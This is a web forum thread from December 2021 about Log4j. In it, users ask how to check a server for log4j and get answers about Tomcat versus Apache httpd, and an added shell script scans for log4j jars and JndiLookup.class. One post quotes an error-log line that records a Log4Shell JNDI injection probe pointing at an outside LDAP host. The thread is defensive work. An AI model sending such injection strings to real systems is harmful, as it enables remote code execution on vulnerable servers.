smallzoo
Joined: 13 Dec 2021 Posts: 3 Location: UK,manchester
|
Posted: Mon 13 Dec '21 22:56 Post subject: LOG4J |
|
|
Is there any way of checking if a server is using log4j anywhere?
I understand this is a bad security risk and needs to be sorted asap.
Thanks |
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7371 Location: Germany, Next to Hamburg
|
Posted: Mon 13 Dec '21 23:50 Post subject: |
|
|
Hi!
That doesn't apply to httpd Apache. Only if you run Apache Tomcat with log4j or any other Java-based software using log4j. And then you can search for a log4j**.jar file. |
|
smallzoo
Joined: 13 Dec 2021 Posts: 3 Location: UK,manchester
|
Posted: Mon 13 Dec '21 23:57 Post subject: |
|
|
James Blond wrote: | Hi!
That doesn't apply to httpd Apache. Only if you run Apache Tomcat with log4j or any other Java-based software using log4j. And then you can search for a log4j**.jar file. |
Sorry for the dumb question, how do I know if the site is running https apache or tomcat? |
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7371 Location: Germany, Next to Hamburg
|
|
dmye
Joined: 23 Nov 2021 Posts: 7
|
Posted: Tue 14 Dec '21 6:39 Post subject: |
|
|
[core:error] (20024)The given path is misformatted or contained invalid characters: [client 1.2.3.4..] AH00127: Cannot map GET /$%7Bjndi:ldap://1.2.3.4..
Why not authz_core:error? core:error it will be because Directory bypass? |
|
smallzoo
Joined: 13 Dec 2021 Posts: 3 Location: UK,manchester
|
Posted: Tue 14 Dec '21 11:27 Post subject: |
|
|
The website is hosted on Amazon EC2.
I can see now that there is a simple patch, but what is the console command to check for every occurrence of log4j in a filename and also in any third party jar file?
Thanks |
|
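One way to run the check asked about above, as an added example that is not part of any post in this thread: a POSIX shell function that lists archives named `log4j*.jar` and also flags other `.jar`/`.war`/`.ear` files that carry log4j inside them. The function name `scan_log4j` and the `NAME`/`CLASS`/`NESTED` labels are this example's own; it assumes a Linux host with `find` and `grep`, and relies on ZIP archives storing their entry names uncompressed.

```shell
#!/bin/sh
# Added example: inventory log4j on a host, by file name and inside other archives.
# Usage: sh scan_log4j.sh /opt        (script and function names are hypothetical)

# Class in log4j-core 2.x that performs the ${jndi:...} lookups.
JNDI_CLASS='org/apache/logging/log4j/core/lookup/JndiLookup.class'

scan_log4j() {
    root=${1:-/}
    # -xdev keeps the scan on one filesystem; remove it to follow other mounts.
    find "$root" -xdev -type f \
        \( -iname '*.jar' -o -iname '*.war' -o -iname '*.ear' \) 2>/dev/null |
    while IFS= read -r f; do
        name=$(printf '%s' "${f##*/}" | tr 'A-Z' 'a-z')
        case $name in
            log4j*.jar)
                # The archive itself is a log4j jar (any version, any module).
                echo "NAME    $f"
                continue ;;
        esac
        # Entry names sit uncompressed in a ZIP, so a byte search of the
        # archive finds them without unpacking anything.
        if grep -a -q -F "$JNDI_CLASS" "$f" 2>/dev/null; then
            # log4j-core classes were copied into this archive (shaded/fat jar).
            echo "CLASS   $f"
        elif grep -a -q -i -E 'log4j[^/]*\.jar' "$f" 2>/dev/null; then
            # A log4j jar is bundled inside, e.g. under WEB-INF/lib/.
            echo "NESTED  $f"
        fi
    done
}

# Run only when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    scan_log4j "$1"
fi
```

Every hit still needs its version read from the file name or the jar manifest before deciding whether it has to be patched. A log4j jar that was renamed and then compressed inside another archive will not show up in a byte search like this one.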
Steffen Moderator
Joined: 15 Oct 2005 Posts: 3092 Location: Hilversum, NL, EU
|
|